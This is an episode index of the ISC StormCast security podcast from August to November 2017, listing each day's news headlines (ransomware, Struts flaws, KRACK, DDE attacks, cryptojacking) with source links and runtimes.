Malicious Document Turns Off Word Macro Protections https://isc.sans.edu/forums/diary/If+you+want+something+done+right+do+it+yourself/23042/ Blueborne Affects Amazon Echo and Google Home Devices (now patched) http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper.pdf More Malicious Apps In Google's Play Store https://www.bleepingcomputer.com/news/security/google-play-store-sees-sudden-surge-of-malicious-apps/ OnePlus Phones Found With Preinstalled Debug App https://twitter.com/fs0c131y https://twitter.com/__Tux/status/754085708843786240
11/16/2017, 6 minutes, 13 seconds

ISC StormCast for Wednesday, November 15th 2017

Microsoft Patch Tuesday Updates https://helpx.adobe.com/security.html Adobe Patches https://helpx.adobe.com/security.html Abusing Anti-Virus Quarantine Folders for Priv. Escalation https://bogner.sh/2017/11/avgater-getting-local-admin-by-abusing-the-anti-virus-quarantine/
11/15/2017, 5 minutes, 45 seconds

ISC StormCast for Tuesday, November 14th 2017

FaceID Beaten By Mask http://www.bkav.com/d/top-news/-/view_content/content/103968/face-id-beaten-by-mask-not-an-effective-security-measure Various URL Validation and HTTP Request Libraries Allow SSRF https://www.blackhat.com/docs/us-17/thursday/us-17-Tsai-A-New-Era-Of-SSRF-Exploiting-URL-Parser-In-Trending-Programming-Languages.pdf Using Heart Rhythm As Biometric ID http://www.buffalo.edu/news/releases/2017/09/034.html
11/14/2017, 7 minutes, 55 seconds

ISC StormCast for Monday, November 13th 2017

Auditing TLS Root Certificates on Windows https://isc.sans.edu/forums/diary/Keep+An+Eye+on+your+Root+Certificates/23030/ How Google Accounts Are Hijacked https://security.googleblog.com/2017/11/new-research-understanding-root-cause.html Battling E-Mail Phishing https://isc.sans.edu/forums/diary/Battling+email+phishing/23028/ Hacking Airplanes http://www.aviationtoday.com/2017/11/08/boeing-757-testing-shows-airplanes-vulnerable-hacking-dhs-says/
11/13/2017, 6 minutes, 41 seconds

ISC StormCast for Friday, November 10th 2017

Twilio Credentials Found in Mobile Apps (requires registration) http://info.appthority.com/-q4-2017-mtr-download-eavesdropper Drive-By Crypto Currency Mining Keeps Increasing https://go.malwarebytes.com/rs/805-USG-300/images/Drive-by_Mining_FINAL.pdf Intel's Management Engine Firmware Decoded https://twitter.com/h0t_max https://www.theregister.co.uk/2017/11/09/chipzilla_come_closer_closer_listen_dump_ime/
11/10/2017, 7 minutes, 9 seconds

ISC StormCast for Thursday, November 9th 2017

Mantistek Gaming Keyboard Cloud Driver Exfiltrates Keystroke Data https://thehackernews.com/2017/11/mantistek-keyboard-keylogger.html Logitech Will Discontinue Harmony Link Device and Brick it via Firmware Update in March 2018 https://www.theverge.com/circuitbreaker/2017/11/8/16623076/logitech-harmony-link-discontinued-bricked Amazon Is Introducing Additional Security Features for S3 https://aws.amazon.com/blogs/aws/new-amazon-s3-encryption-security-features/
11/9/2017, 6 minutes, 26 seconds

ISC StormCast for Wednesday, November 8th 2017

Interesting RTF Maldoc VBA Dropper https://isc.sans.edu/forums/diary/Interesting+VBA+Dropper/23016/ Multiple Linux USB Flaws Made Public http://www.openwall.com/lists/oss-security/2017/11/06/8 Google Android November Patches https://source.android.com/security/bulletin/2017-11-01#media-framework Ethereum Multi Signature Wallet Bug Causes Loss of $280 Million https://paritytech.io/blog/security-alert.html https://github.com/paritytech/parity/issues/6995
11/8/2017, 6 minutes, 31 seconds

ISC StormCast for Tuesday, November 7th 2017

Fake WhatsApp App in Google Play Store https://www.reddit.com/r/Android/comments/7ahujw/psa_two_different_developers_under_the_same_name/ Crunchyroll.com Redirect Leads to Malware https://blog.ellation.com/crunchyroll-com-update-a2a593cf9155 https://bartblaze.blogspot.com.au/2017/11/crunchyroll-hack-delivers-malware.html Recovering Previously Encrypted iOS Backups https://www.gillware.com/forensics/blog/digital-forensics-case-study/new-solution-encrypted-backups/
11/7/2017, 6 minutes, 17 seconds

ISC StormCast for Monday, November 6th 2017

PDF Parser for URLs and Text Content of PDFs https://isc.sans.edu/forums/diary/Extracting+the+text+from+PDF+documents/23008/ https://isc.sans.edu/forums/diary/PDF+documents+URLs/23006/ Mobile Pwn2Own Contest 2017 https://www.zerodayinitiative.com/blog OpenSSL Patch https://www.openssl.org/news/secadv/20171102.txt IEEE P1735 Standard Leads to Weak Crypto https://eprint.iacr.org/2017/828.pdf
11/6/2017, 5 minutes, 15 seconds

ISC StormCast for Friday, November 3rd 2017

Certified Malware: Measuring Breaches of Trust in the Windows Code-Signing PKI http://www.umiacs.umd.edu/~tdumitra/papers/CCS-2017.pdf Half of Most Popular Free iOS Apps do not use TLS correctly http://www.zeit.de/digital/datenschutz/2017-10/iphone-ios-apps-hacker-verschluesselung/komplettansicht#comments Image Downloader Chrome Extension Includes Adware https://www.bleepingcomputer.com/news/security/psa-beware-the-image-downloader-chrome-adware-extension/ Employees Pay Up Ransomware https://www.bleepingcomputer.com/news/security/59-percent-of-employees-hit-by-ransomware-at-work-paid-ransom-out-of-their-own-pockets/
11/2/2017, 7 minutes, 13 seconds

ISC StormCast for Thursday, November 2nd 2017

Configuring SSH Properly on Cisco IOS https://isc.sans.edu/forums/diary/Securing+SSH+Services+Go+Blue+Team/22992/ Ethereum Miners Hijacked via Default SSH Credentials https://labs.bitdefender.com/2017/11/ethereum-os-miners-targeted-by-ssh-based-hijacker/ Crypto Shuffler Steals Bitcoin From Clipboard https://www.kaspersky.com/blog/cryptoshuffler-bitcoin-stealer/19976/ Google Calendar Event Injection Added To MailSniper https://www.blackhillsinfosec.com/google-calendar-event-injection-mailsniper/ November Ouch! Newsletter released: Shopping Security Online https://securingthehuman.sans.org/resources/newsletters/ouch/2017?utm_medium=Social&utm_source=Twitter&utm_content=OUCH+Nov+2017+all+languages+&utm_campaign=STH+Ouch+#november2017
11/1/2017, 5 minutes, 37 seconds

ISC StormCast for Wednesday, November 1st 2017

Malicious Powershell Code https://isc.sans.edu/forums/diary/Some+Powershell+Malicious+Code/22988/ Apple Updates Everything https://support.apple.com/en-gb/HT201222 Internet Draft To Update IoT Devices https://tools.ietf.org/html/draft-moran-suit-architecture-00
10/31/20175 minutes, 21 seconds
ISC StormCast for Tuesday, October 31st 2017

Google Chrome Moving Away from HTTPS Public Key Pinning (HPKP) https://groups.google.com/a/chromium.org/forum/#!msg/blink-dev/he9tr7p3rZ8/eNMwKPmUBAAJ Effort To Remove Trust From Dutch CA Over New Intercept Law https://bugzilla.mozilla.org/show_bug.cgi?id=1408647 Crypto Coin Mining Feature Found in Google App Store Downloads http://blog.trendmicro.com/trendlabs-security-intelligence/coin-miner-mobile-malware-returns-hits-google-play/
10/30/2017, 6 minutes, 8 seconds

ISC StormCast for Monday, October 30th 2017

Critical New Oracle Patch http://www.oracle.com/technetwork/security-advisory/alert-cve-2017-10151-4016513.html CatchAll Google Chrome Plugins https://isc.sans.edu/forums/diary/CatchAll+Google+Chrome+Malicious+Extension+Steals+All+Posted+Data/22976/ ACE Files Used For Malware https://isc.sans.edu/forums/diary/Remember+ACE+files/22978/
10/29/2017, 5 minutes, 6 seconds

ISC StormCast for Friday, October 27th 2017

Results of Kaspersky's Internal Investigation https://www.kaspersky.com/blog/internal-investigation-preliminary-results/19894/ Infineon Bug Testing Tool https://gist.githubusercontent.com/marcan/fc87aa78085c2b6f979aefc73fdc381f/raw/526bc2f2249a2e3f5d4450c7c412e0dbf57b2288/roca_test.py https://github.com/ThomasHabets/simple-tpm-pk11/blob/master/check-srk/check-srk.cc Micropatch Available for "DDE Vulnerability" https://0patch.blogspot.com/2017/10/0patching-office-dde-ddeauto.html Finding Cryptocurrency Miners https://medium.com/@s3yfullah/hacking-cryptocurrency-miners-with-osint-techniques-677bbb3e0157
10/26/2017, 5 minutes, 58 seconds

ISC StormCast for Thursday, October 26th 2017

Coinhive Domain Compromise https://coinhive.com/blog/dns-breach Dell Loses Control of Backup and Recovery Cloud Storage Domain https://krebsonsecurity.com/2017/10/dell-lost-control-of-key-customer-support-domain-for-a-month-in-2017/#more-41267 Google ReCaptcha Broken https://github.com/ecthros/uncaptcha Users in Iran Targeted by Cryptoransomware Masquerading as VPN https://www.bleepingcomputer.com/news/security/tyrant-ransomware-spreads-in-iran-disguised-as-popular-vpn-app/ Crypto Currency Phishing https://www.dearbytes.com/blog/cryptocurrency-phishing/
10/25/2017, 6 minutes, 25 seconds

ISC StormCast for Wednesday, October 25th 2017

Stop Relying on File Extensions https://isc.sans.edu/forums/diary/Stop+relying+on+file+extensions/22962/ BadRabbit New Ransomware Wave Hitting Russia and Ukraine https://isc.sans.edu/forums/diary/BadRabbit+New+ransomware+wave+hitting+RU+UA/22964/ https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/ Over 70% Of Web Traffic Now via TLS https://transparencyreport.google.com/https/overview?hl=en Static RNG Seeds in Fortinet Devices https://duhkattack.com
10/24/2017, 5 minutes, 4 seconds

ISC StormCast for Tuesday, October 24th 2017

Is a Telco in Brazil Hosting An Epidemic of Open SOCKS Proxies? https://isc.sans.edu/forums/diary/Is+a+telco+in+Brazil+hosting+an+epidemic+of+open+SOCKS+proxies/22956/ Android May Be Adding DNS Over TLS https://www.xda-developers.com https://tools.ietf.org/html/rfc7858 Fake Crypto Currency Trading Applications https://www.welivesecurity.com/2017/10/23/fake-cryptocurrency-apps-google-harvesting-credentials/
10/23/2017, 6 minutes, 3 seconds

ISC StormCast for Sunday, October 22nd 2017

IoT "Reaper" Botnet http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/ https://research.checkpoint.com/new-iot-botnet-storm-coming/ Elmedia Player and Folx Infected with Proton Malware https://www.eltima.com/blog/2017/10/elmedia-player-and-folx-malware-threat-neutralized.html Google Expands Bug Bounty To Popular Android Apps https://www.google.com/about/appsecurity/play-rewards/index.html Increased Use of Last Week's Flash Vulnerability https://www.proofpoint.com/us/threat-insight/post/apt28-racing-exploit-cve-2017-11292-flash-vulnerability-patches-are-deployed
10/22/2017, 5 minutes, 38 seconds

ISC StormCast for Friday, October 20th 2017

Locky Ransomware Updates https://isc.sans.edu/forums/diary/Necurs+Botnet+malspam+pushes+Locky+using+DDE+attack/22946/ https://isc.sans.edu/forums/diary/HSBCthemed+malspam+uses+ISO+attachments+to+push+Loki+Bot+malware/22942/ Authedmine To Replace Coinhive https://coinhive.com/blog/authedmine Attackers Scan for SSH Keys via Web Exploits https://www.wordfence.com/blog/2017/10/ssh-key-website-scans/ Attacking Colocated Virtual Machines with Rowhammer https://thisissecurity.stormshield.com/2017/10/19/attacking-co-hosted-vm-hacker-hammer-two-memory-modules/
10/20/2017, 5 minutes, 52 seconds

ISC StormCast for Thursday, October 19th 2017

Baselining Servers to Detect Outliers https://isc.sans.edu/forums/diary/Baselining+Servers+to+Detect+Outliers/22940/ Test Script Available for KRACK Vulnerability https://github.com/vanhoefm/krackattacks-test-ap-ft WaterMiner Distributed With Gaming Mods https://minerva-labs.com/post/waterminer-a-new-evasive-crypto-miner Microsoft Releases Fall Creators Update https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/#76CQXoUYxT81RLJi.97
10/19/2017, 5 minutes, 13 seconds

ISC StormCast for Wednesday, October 18th 2017

Hancitor Malspam Uses DDE Attack To Spread Banking Malware https://isc.sans.edu/forums/diary/Hancitor+malspam+uses+DDE+attack/22936/ Infineon RSA Key Generation Weakness https://crocs.fi.muni.cz/public/papers/rsa_ccs17 Chrome Improving Security https://www.blog.google/products/chrome/cleaner-safer-web-chrome-cleanup/
10/18/2017, 5 minutes, 20 seconds

ISC StormCast for Tuesday, October 17th 2017

WPA2 "Krack" Attack https://www.krackattacks.com/ https://securingthehuman.sans.org/blog/2017/10/16/28748/ Adobe Flash Player Update https://helpx.adobe.com/security/products/flash-player/apsb17-32.html Two (identical) uTorrent Binaries With Different Hashes https://isc.sans.edu/forums/diary/Its+in+the+signature/22928/
10/16/2017, 8 minutes, 40 seconds

ISC StormCast for Monday, October 16th 2017

Peeking Into an Outlook .msg File https://isc.sans.edu/forums/diary/Peeking+into+msg+files/22926/ Abandoned Domains / Equifax/Transunion Lead to Fake Flash Update https://blog.malwarebytes.com/threat-analysis/2017/10/equifax-transunion-websites-push-fake-flash-player/ Microsoft Patch Causes Corrupted Systems https://support.microsoft.com/en-us/help/4049094 DoubleLocker Android Ransomware https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/ Chrome Extension Mines Crypto Currency https://www.bleepingcomputer.com/news/security/chrome-extension-uses-your-gmail-to-register-domains-names-and-injects-coinhive/
10/15/2017, 5 minutes, 29 seconds

ISC StormCast for Friday, October 13th 2017

Version Control Tools Are Not Only For Developers https://isc.sans.edu/forums/diary/Version+control+tools+arent+only+for+Developers/22922/ Coin Hive Javascript Crypto Currency Miner Found on Piratebay https://twitter.com/esterling_/status/918240914623090695 https://crypto-loot.com Macro-less Code Exec in MSWord Rediscovered https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/ https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/ Hard Disks Can Be Used As Microphones https://github.com/ortegaalfredo/kscope/blob/master/doc/HDD-microphones.pdf
10/12/2017, 5 minutes, 54 seconds

ISC StormCast for Thursday, October 12th 2017

Outlook Includes plain text version of e-mail with S/MIME Encryption https://www.sec-consult.com/en/blog/2017/10/fake-crypto-microsoft-outlook-smime-cleartext-disclosure-cve-2017-11776/index.html RubyGems Remote Code Execution Vulnerability http://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-vulnerability.html Google Home Mini Recorded Everything http://www.androidpolice.com/2017/10/10/google-nerfing-home-minis-mine-spied-everything-said-247/ Cameradar Finds Open RTSP Streams https://github.com/EtixLabs/cameradar
10/11/2017, 6 minutes, 36 seconds

ISC StormCast for Wednesday, October 11th 2017

Microsoft Monthly Updates https://isc.sans.edu/forums/diary/October+2017+Security+Updates/22916/ Spoofed iOS iCloud Login https://krausefx.com/blog/ios-privacy-stealpassword-easily-get-the-users-apple-id-password-just-by-asking
10/11/2017, 5 minutes, 53 seconds

ISC StormCast for Tuesday, October 10th 2017

Base64 Encoded Word Documents https://isc.sans.edu/forums/diary/Base64+All+The+Things/22912/ Skimmer Scanner Helps Find Credit Card Skimmers https://github.com/sparkfunX/Skimmer_Scanner TLS 1.3 Remains "On Hold" https://www.ietf.org/mail-archive/web/tls/current/msg24517.html FIDO U2F Key Review / Test https://www.imperialviolet.org/2017/10/08/securitykeytest.html
10/9/2017, 6 minutes, 33 seconds

ISC StormCast for Sunday, October 8th 2017

Payment Handler API https://w3c.github.io/payment-handler/ https://blog.lukaszolejnik.com/privacy-of-web-request-api/ OpenSSH Version 7.6 Released http://www.openssh.com/txt/release-7.6 Microsoft Delaying Some Patches for Earlier Windows Versions https://googleprojectzero.blogspot.sg/2017/10/using-binary-diffing-to-discover.html The Dangers of Cables https://isc.sans.edu/forums/diary/Whats+in+a+cable+The+dangers+of+unauthorized+cables/22904/
10/8/2017, 8 minutes, 11 seconds

ISC StormCast for Friday, October 6th 2017

Extract HTTP Requests from PCAPs and Turn Them Into cURL Commands https://isc.sans.edu/forums/diary/pcap2curl+Turning+a+pcap+file+into+a+set+of+cURL+commands+for+replay/22900/ Apple Patches Embarrassing MacOS High Sierra Flaw https://www.appleworld.today/blog/2017/10/5/macos-high-sierra-flaw-exposes-passwords-of-encrypted-apfs-volumes Another Tomcat PUT Vulnerability https://lists.apache.org/thread.html/3fd341a604c4e9eab39e7eaabbbac39c30101a022acc11dd09d7ebcb@%3Cannounce.tomcat.apache.org%3E Dallas Haselhorst: HL7 Healthcare Protocol https://www.sans.org/reading-room/whitepapers/hipaa/hl7-data-interfaces-medical-environments-understanding-fundamental-flaw-healthcare-38005 https://www.sans.org/reading-room/whitepapers/vpns/hl7-data-interfaces-medical-environments-attacking-defending-achilles-heel-healthcare-38010 https://www.tripwire.com/state-of-security/security-data-protection/hl7-data-interfaces-in-medical-environments/
10/6/2017, 15 minutes, 40 seconds

ISC StormCast for Thursday, October 5th 2017

Cyber Security Awareness Month: Ouch! Newsletter https://securingthehuman.sans.org/newsletters/ouch/issues/OUCH-201710_en.pdf Modified Rowhammer Attack Bypasses Current Defenses https://arxiv.org/pdf/1710.00551.pdf Metasploit Modules For VMWare Escape https://www.zerodayinitiative.com/blog/2017/10/04/vmware-escapology-how-to-houdini-the-hypervisor
10/4/2017, 5 minutes, 39 seconds

ISC StormCast for Wednesday, October 4th 2017

Fedex Malspam Pushes Formbook Infostealer Malware https://isc.sans.edu/forums/diary/Malspam+pushing+Formbook+info+stealer/22888/ Wordpress Plugins Heavily Abused For Site Defacements https://www.wordfence.com/blog/2017/10/3-zero-day-plugin-vulnerabilities-exploited-wild/ Fake WordPress Security Plugin Being Advertised https://blog.sucuri.net/2017/09/fake-plugins-fake-security.html Proof Of Concept Information Disclosure for Internet Explorer https://www.brokenbrowser.com/revealing-the-content-of-the-address-bar-ie/ Nzyme Wifi Frame Recording and Forensics https://wtf.horse/2017/10/02/introducing-nzyme-wifi-802-11-frame-recording-and-forensics/ Cyber Security Interviews https://twitter.com/CSI_Podcast/status/915026734801489921
10/4/2017, 6 minutes, 1 second

ISC StormCast for Tuesday, October 3rd 2017

Passive DNS: Investigating Security Incidents with Passive DNS Bypassing Domain Authentication https://medium.freecodecamp.org/how-i-hacked-hundreds-of-companies-through-their-helpdesk-b7680ddc2d4c DNSMasq Vulnerabilities https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
10/3/2017, 5 minutes, 52 seconds

ISC StormCast for Monday, October 2nd 2017

Who's Borrowing Your Resources. Javascript Monero Miners on Video Sites https://isc.sans.edu/forums/diary/Whos+Borrowing+your+Resources/22882/ OS X Silently Patches Javascript Quarantine Bypass https://www.wearesegment.com/research/Mac-OS-X-Local-Javascript-Quarantine-Bypass.html Apple EFI Updates Often Not Applied https://duo.com/blog/the-apple-of-your-efi-mac-firmware-security-research
10/2/2017, 5 minutes, 22 seconds

ISC StormCast for Friday, September 29th 2017

Dealing With Massive Packet Captures https://isc.sans.edu/forums/diary/The+easy+way+to+analyze+huge+amounts+of+PCAP+data/22876/ Illusion Gap Anti-Virus Bypass https://www.cyberark.com/threat-research-blog/illusion-gap-antivirus-bypass-part-1/ DNSSEC KSK Update Delayed https://www.icann.org/news/announcement-2017-09-27-en Linux PIE/Stack Corruption https://www.qualys.com/2017/09/26/cve-2017-1000253/cve-2017-1000253.txt
9/29/2017, 5 minutes, 48 seconds

ISC StormCast for Thursday, September 28th 2017

Everything You Ever Wanted To Know About JPEGs (and more) https://isc.sans.edu/forums/diary/It+is+a+resume+Part+3/22808/ Linux 4.14 Memory Encryption https://lwn.net/Articles/686808/ CLKSCREW: Exposing Secure Enclaves via Energy Management https://www.usenix.org/system/files/conference/usenixsecurity17/sec17-tang.pdf
9/28/2017, 5 minutes, 14 seconds

ISC StormCast for Wednesday, September 27th 2017

XPCTRA Steals Banking / Cryptocurrency Info https://isc.sans.edu/forums/diary/XPCTRA+Malware+Steals+Banking+and+Digital+Wallet+Users+Credentials/22868/ Vulnerable Mobile Investment Applications http://blog.ioactive.com/2017/09/are-you-trading-securely-insights-into.html iOS WiFi Exploit PoC Code Published https://bugs.chromium.org/p/project-zero/issues/detail?id=1289 Android Malware Exploiting "Dirty Cow" http://blog.trendmicro.com/trendlabs-security-intelligence/zniu-first-android-malware-exploit-dirty-cow-vulnerability/
9/27/2017, 5 minutes, 18 seconds

ISC StormCast for Tuesday, September 26th 2017

macOS High Sierra Security Updates https://support.apple.com/en-us/HT201222 Possible macOS Keychain Leak https://twitter.com/patrickwardle/status/912254053849079808 Monero Cryptocoin Miner Found on Showtime Website https://badpackets.net/coinhive-miner-found-on-official-showtime-network-websites-in-latest-case-of-cryptojacking/
9/26/2017, 5 minutes, 39 seconds

ISC StormCast for Monday, September 25th 2017

Forensic Use of "mount --bind" https://isc.sans.edu/forums/diary/Forensic+use+of+mount+bind/22854/ Adobe Publishes Secret PGP Key By Mistake https://twitter.com/jupenur/status/911286403434246144 AVAST Publishes CCleaner Update https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident Compromised Android Keyboard App https://blog.adguard.com/en/go-spy-go-popular-android-keyboard-from-china-crosses-the-red-line/
9/25/2017, 6 minutes

ISC StormCast for Friday, September 22nd 2017

More (Likely Fake) DDoS Extortion Attempts https://isc.sans.edu/forums/diary/Emails+threatening+DDoS+allegedly+from+Phantom+Squad/22856/ CVE-2017-8759 Used in Cyber Crime Attacks https://isc.sans.edu/forums/diary/Email+attachment+using+CVE20178759+exploit+targets+Argentina/22850/ CCleaner Command and Control Server http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html?m=1 Vulnerability in Intel Management Engine Can Lead to Execution of Unsigned Code https://www.blackhat.com/eu-17/briefings/schedule/#how-to-hack-a-turned-off-computer-or-running-unsigned-code-in-intel-management-engine-8668
9/22/2017, 5 minutes, 37 seconds

Episode Artwork

ISC StormCast for Thursday, September 21st 2017

Newest Locky Update: RAR Attachments and "Invoice" E-Mails https://isc.sans.edu/forums/diary/Ongoing+Ykcol+Locky+campaign/22848/
Viacom S3 Bucket Leak https://www.upguard.com/breaches/cloud-leak-viacom
iOS 11 Outlook.com Bug https://support.apple.com/en-us/HT208136
9/21/2017 (5 minutes, 37 seconds)

ISC StormCast for Wednesday, September 20th 2017

Mac-Robber Python Rewrite https://isc.sans.edu/forums/diary/New+tool+macrobberpy/22844/
Apache Tomcat Patch https://www.us-cert.gov/ncas/current-activity/2017/09/19/Apache-Releases-Security-Updates-Apache-Tomcat
Apple Updates For iOS, Xcode, tvOS, watchOS and Safari https://support.apple.com/en-us/HT201222
9/20/2017 (6 minutes, 1 second)

ISC StormCast for Tuesday, September 19th 2017

CCleaner Compromise http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html http://www.piriform.com/news/release-announcements/2017/9/18/security-notification-for-ccleaner-v5336162-and-ccleaner-cloud-v1073191-for-32-bit-windows-users
Word INCLUDEPICTURE Feature Abuse https://securelist.com/an-undocumented-word-feature-abused-by-attackers/81899/
security.txt file https://www.ietf.org/id/draft-foudil-securitytxt-00.txt https://www.ietf.org/rfc/rfc2142.txt
9/19/2017 (8 minutes, 8 seconds)

ISC StormCast for Monday, September 18th 2017

Bashware: Bypassing Windows Security via Linux (WSL) https://research.checkpoint.com/beware-bashware-new-method-malware-bypass-security-solutions/
JavaScript Rogue Cryptocurrency Miner https://www.welivesecurity.com/2017/09/14/cryptocurrency-web-mining-union-profit/
NodeJS Hash Table DoS https://medium.com/@ahmadbamieh/nodejs-constant-hashtables-seeds-vulnerability-f03bf70e3593
HTTPS Interception https://blog.cloudflare.com/understanding-the-prevalence-of-web-traffic-interception/
9/18/2017 (5 minutes, 54 seconds)

ISC StormCast for Friday, September 15th 2017

Another Webshell; Another Backdoor https://isc.sans.edu/forums/diary/Another+webshell+another+backdoor/22826/
D-Link Vulnerability https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html
Chrome To Label FTP As Insecure https://groups.google.com/a/chromium.org/forum/#!msg/security-dev/HknIAQwMoWo/xYyezYV5AAAJ
More Google Play Store Malware https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/
Elasticsearch Botnet https://mackeepersecurity.com/post/kromtech-discovers-massive-elasticsearch-infected-malware-botnet
9/15/2017 (5 minutes, 27 seconds)

ISC StormCast for Thursday, September 14th 2017

No IPv6? Challenge Accepted https://isc.sans.edu/forums/diary/No+IPv6+Challenge+Accepted+Part+1/22820/
Exploiting CVE-2017-8759 https://www.mdsec.co.uk/2017/09/exploiting-cve-2017-8759-soap-wsdl-parser-code-injection/
WordPress Plugin Found With Backdoor https://www.pluginvulnerabilities.com/2017/09/11/wordpress-poor-handling-of-plugin-security-exacerbates-malicious-takeover-of-display-widgets/
9/14/2017 (5 minutes)

ISC StormCast for Wednesday, September 13th 2017

Microsoft Patch Tuesday https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html https://technet.microsoft.com/security/advisories
BlueBorne Bluetooth Vulnerability http://go.armis.com/hubfs/BlueBorne%20Technical%20White%20Paper.pdf
9/13/2017 (5 minutes, 39 seconds)

ISC StormCast for Tuesday, September 12th 2017

Cisco Struts Updates https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170909-struts2-rce
Google Chrome Warning Users of Anti-Malware SSL Interception https://twitter.com/sashaperigo/status/906263091624591360
Machine Learning To Identify Malicious TLS Connections https://arxiv.org/pdf/1607.01639.pdf
Comodo Breaking CAA Standard https://www.mail-archive.com/[email protected]/msg08027.html
9/12/2017 (6 minutes, 37 seconds)

ISC StormCast for Monday, September 11th 2017

Analyzing JPEG Files https://isc.sans.edu/forums/diary/Analyzing+JPEG+files/22806/
Auditing Windows With WINspect https://isc.sans.edu/forums/diary/Windows+Auditing+with+WINspect/22810/
Windows PSSetLoadImageNotifyRoutine Vulnerability https://breakingmalware.com/documentation/windows-pssetloadimagenotifyroutine-callbacks-good-bad-unclear-part-1/
IOTA Cryptocurrency Vulnerable Hash Function https://medium.com/@neha/cryptographic-vulnerabilities-in-iota-9a6a9ddc4367
9/11/2017 (5 minutes, 49 seconds)

ISC StormCast for Friday, September 8th 2017

Yet Another Struts RCE Vulnerability https://struts.apache.org/docs/s2-053.html
Equifax Compromise https://www.bloomberg.com/news/articles/2017-09-07/three-equifax-executives-sold-stock-before-revealing-cyber-hack
Hash Extension Flaws https://isc.sans.edu/forums/diary/Modern+Web+Application+Penetration+Testing+Hash+Length+Extension+Attacks/22792/
Matt Hosburgh: Offensive Intrusion Analysis: Uncovering Insiders with Threat Hunting and Active Defense
9/8/2017 (15 minutes, 37 seconds)

ISC StormCast for Thursday, September 7th 2017

Struts2 Metasploit Module https://github.com/rapid7/metasploit-framework/pull/8924/commits/5ea83fee5ee8c23ad95608b7e2022db5b48340ef
Google Docs Table With Hacked MongoDB Databases https://docs.google.com/spreadsheets/d/1QonE9oeMOQHVh8heFIyeqrjfKEViL0poLnY8mAakKhM/edit#gid=1781677175
Bypassing Cloudflare https://rhinosecuritylabs.com/cloud-security/cloudflare-bypassing-cloud-security/
9/7/2017 (5 minutes, 16 seconds)

ISC StormCast for Wednesday, September 6th 2017

A Look Back At Mirai and What's Next https://isc.sans.edu/forums/diary/The+Mirai+Botnet+A+Look+Back+and+Ahead+At+Whats+Next/22786/
New Struts Vulnerability and Patch https://isc.sans.edu/forums/diary/Struts+vulnerability+patch+released+by+apache+patch+now/22788
Mastercard Internet Gateway Service Flaw http://tinyhack.com/2017/09/05/mastercard-internet-gateway-service-hashing-design-flaw/
Mac OS X High Sierra Insecure Kernel Module Loading https://objective-see.com/blog/blog_0x21.html
9/6/2017 (6 minutes, 47 seconds)

ISC StormCast for Tuesday, September 5th 2017

Locky Ransomware is Back and This Time Pretends to Be a Font https://isc.sans.edu/forums/diary/Malspam+pushing+Locky+ransomware+tries+HoeflerText+notifications+for+Chrome+and+FireFox/22776/
When is a PDF Just a PDF? https://isc.sans.edu/forums/diary/It+is+a+resume+Part+1/22780/
Asterisk Vulnerable to RTPBleed https://github.com/EnableSecurity/advisories/tree/master/ES2017-04-asterisk-rtp-bleed
Arris AT&T Modems With Backdoor https://www.nomotion.net/blog/sharknatto/
9/5/2017 (6 minutes, 18 seconds)

ISC StormCast for Friday, September 1st 2017

Is Remote Work Feasible in a SOC? https://isc.sans.edu/forums/diary/Remote+SOC+Workers+Concerns/22772/
Linux Random Number Generator Reviewed https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Studien/LinuxRNG/LinuxRNG_EN.pdf?__blob=publicationFile&v=5
Adobe Acrobat and Reader Security Patch https://blogs.adobe.com/psirt/?p=1484
Turning Speakers into Microphones https://www.usenix.org/system/files/conference/woot17/woot17-paper-guri.pdf
9/1/2017 (14 minutes, 25 seconds)

ISC StormCast for Thursday, August 31st 2017

IoT Gear Affected by ConnMan Vulnerability http://connmando.nri-secure.co.jp/index.html
Trickbot Going After Coinbase https://blogs.forcepoint.com/security-labs/trickbot-goes-after-cryptocurrency
Pacemakers Need Patch https://www.fda.gov/MedicalDevices/Safety/AlertsandNotices/ucm573669.htm
Inaudible Voice Commands https://arxiv.org/pdf/1708.07238.pdf
8/30/2017 (6 minutes, 28 seconds)

ISC StormCast for Wednesday, August 30th 2017

Another Chrome Extension Banking Malware https://isc.sans.edu/forums/diary/Second+Google+Chrome+Extension+Banker+Malware+in+Two+Weeks/22766/
Vulnerable Docker VM https://www.notsosecure.com/vulnerable-docker-vm/
Large Spam E-Mail and Password List Discovered https://www.troyhunt.com/inside-the-massive-711-million-record-onliner-spambot-dump/
8/30/2017 (6 minutes, 6 seconds)

ISC StormCast for Tuesday, August 29th 2017

Survey of Recent DVR Attacks https://isc.sans.edu/forums/diary/An+Update+On+DVR+Malware+A+DVR+Torture+Chamber/22762/
Disabling Intel ME http://blog.ptsecurity.com/2017/08/disabling-intel-me.html
WireX Takedown https://blogs.akamai.com/2017/08/the-wirex-botnet-an-example-of-cross-organizational-cooperation.html
8/29/2017 (5 minutes, 38 seconds)

ISC StormCast for Monday, August 28th 2017

Analyzing 7zip Malware https://isc.sans.edu/forums/diary/Malware+analysis+searching+for+dots/22758/
Worldwide DNS Manipulation Survey https://people.eecs.berkeley.edu/~pearce/papers/dns_usenix_2017.pdf
Sophos Withdraws UTM Update https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released
Cryptocurrency Malware https://resources.netskope.com/h/i/361264722-coin-mining-malware-heads-to-the-cloud-with-zminer
8/28/2017 (6 minutes, 49 seconds)

ISC StormCast for Friday, August 25th 2017

